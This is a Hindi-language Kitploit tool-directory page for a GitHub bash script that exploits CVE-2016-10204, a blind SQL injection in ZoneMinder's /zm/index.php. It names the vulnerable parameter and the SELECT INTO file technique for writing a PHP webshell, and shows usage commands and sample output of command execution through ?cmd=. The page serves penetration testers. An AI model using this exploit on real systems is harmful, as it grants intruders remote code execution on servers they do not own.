Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2016-10204_Webshell — एक bash स्क्रिप्ट जो CVE-2016-10204 के मैन्युअल शोषण को एक लक्ष्य एंडपॉइंट पर प्रदर्शित करती है, जिसके परिणामस्वरूप php webshell अपलोड होता है। | Kitploit
उपकरण/GitHubGitHub/0xnullcomet/cve-2016-10204_webshell
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHub0xnullcomet/cve-2016-10204_webshell

CVE-2016-10204_Webshell

एक bash स्क्रिप्ट जो CVE-2016-10204 के मैन्युअल शोषण को एक लक्ष्य एंडपॉइंट पर प्रदर्शित करती है, जिसके परिणामस्वरूप php webshell अपलोड होता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
267 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2016-10204_Webshell

एक bash स्क्रिप्ट जो CVE-2016-10204 के मैन्युअल शोषण को एक लक्ष्य एंडपॉइंट के विरुद्ध प्रदर्शित करती है, जिससे एक php वेबशेल अपलोड होता है।

वर्तमान में, webshell वेरिएबल MySQL पेलोड के लिए सेट है। इसे आप जिस भी बैकएंड को लक्षित करना चाहते हैं, उससे बदला जा सकता है।

इस CVE के बारे में अधिक जानकारी इन स्रोतों पर मिल सकती है:

  • https://nvd.nist.gov/vuln/detail/CVE-2016-10204
  • https://www.exploit-db.com/exploits/41239
  • https://www.openwall.com/lists/oss-security/2017/02/05/1

यह स्क्रिप्ट कई तरीकों से काम करती है:

  • एक लक्ष्य URL को ^(http|https)://[^/]+/zm/index.php$ के रेगुलर एक्सप्रेशन प्रारूप में लेती है
    • उदा. http://192.168.10.100/zm/index.php
  • जाँचती है कि दिए गए लक्ष्य URL और webshell URL सफिक्स पर पहले से कोई webshell मौजूद है या नहीं
    • यदि मौजूद है, तो पुनः शोषण नहीं करती।
    • यदि मौजूद नहीं है, तो आगे बढ़ती है
  • /zm/index.php?view=request&request=log&task=query&limit=100&minTime=1466674406.084434 एंडपॉइंट पर एक दुर्भावनापूर्ण POST अनुरोध बनाती है
    • इस अनुरोध में &limit=100 पैरामीटर पर एक इंजेक्शन बिंदु है जिसका हम निम्नलिखित के लिए दुरुपयोग करते हैं
    • /var/www/html के अंदर एक नई webshell फ़ाइल बनाते हैं
    • स्ट्रिंग "" को INTO इस फ़ाइल में SELECT करते हैं (हम फ़ाइल लिखते समय इसे स्ट्रीम करते हैं)
  • पुष्टि करती है कि अपलोड की गई webshell बनाई गई थी और निर्मित URL पर सुलभ है
  • 'id' कमांड को निष्पादित करके और उसका आउटपुट प्रस्तुत करके इसका प्रमाण प्रदान करती है

उपयोग:

┌──(user㉿kali)-[~/Downloads]
└─$ /bin/chmod +x CVE-2016-10204_Webshell.sh

┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh testme http://127.0.0.1/zm/index.php

सामान्य उपयोग:
/bin/bash CVE-2016-10204_Webshell.sh <webshell_url_suffix> <http://target_endpoint/zm/index.php>

सहायता:


उदाहरण:


┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]

[*]================================[*]
[*]Target Host: 192.168.177.52:3305          [*]
[*]Target Endpoint: http://192.168.177.52:3305/zm/index.php      [*]
[*]================================[*]


[*]================================[*]
[*]Attempting webshell deployment. [*]
[*]================================[*]
Warning: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or
Warning: consider "--output <FILE>" to save to a file.
Exit Code for Timeout: 23

[*]================================[*]
[*]Webshell deployment successful. [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] Execution is available via the ?cmd= parameter [*]
[*]================================[*]


पहले से शोषित लक्ष्य पर पुनः चलाना:

┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]

[*]================================[*]
[*]Target Host: 192.168.177.52:3305          [*]
[*]Target Endpoint: http://192.168.177.52:3305/zm/index.php      [*]
[*]================================[*]


[*]================================[*]
[*]Webshell already deployed.      [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] Execution is available via the ?cmd= parameter [*]
[*]================================[*]


शामिल सहायता:

┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh -h

[+]================================[+]
[+]CVE-2016-10204 - Blind SQLi Webshell Tool [+]
[+]Author Repo: https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
CVE-2016-10204_Webshell
एक bash स्क्रिप्ट जो CVE-2016-10204 के मैन्युअल शोषण को एक लक्ष्य एंडपॉइंट के विरुद्ध प्रदर्शित करती है,
जिससे एक php वेबशेल अपलोड होता है।

अधिक जानकारी:
- https://nvd.nist.gov/vuln/detail/CVE-2016-10204
- https://www.exploit-db.com/exploits/41239
- https://www.openwall.com/lists/oss-security/2017/02/05/1

उपयोग:
  /bin/bash CVE-2016-10204_Webshell.sh <webshell_url_suffix> <http://target/zm/index.php>

उदाहरण:
  /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php

नोट्स:
- शोषण का प्रयास करने से पहले जाँचता है कि कोई webshell पहले से मौजूद है या नहीं।
- /var/www/html में PHP webshell लिखने के लिए एक दुर्भावनापूर्ण SQLi पेलोड बनाता है।
- ?cmd= पैरामीटर के माध्यम से 'id' निष्पादित करके तैनाती की पुष्टि करता है।
- कृपया केवल उन उपकरणों के विरुद्ध जिम्मेदारी से उपयोग करें जिनकी आपके पास अनुमति है। यह केवल शैक्षिक उद्देश्यों के लिए है।

टूल डाउनलोड करें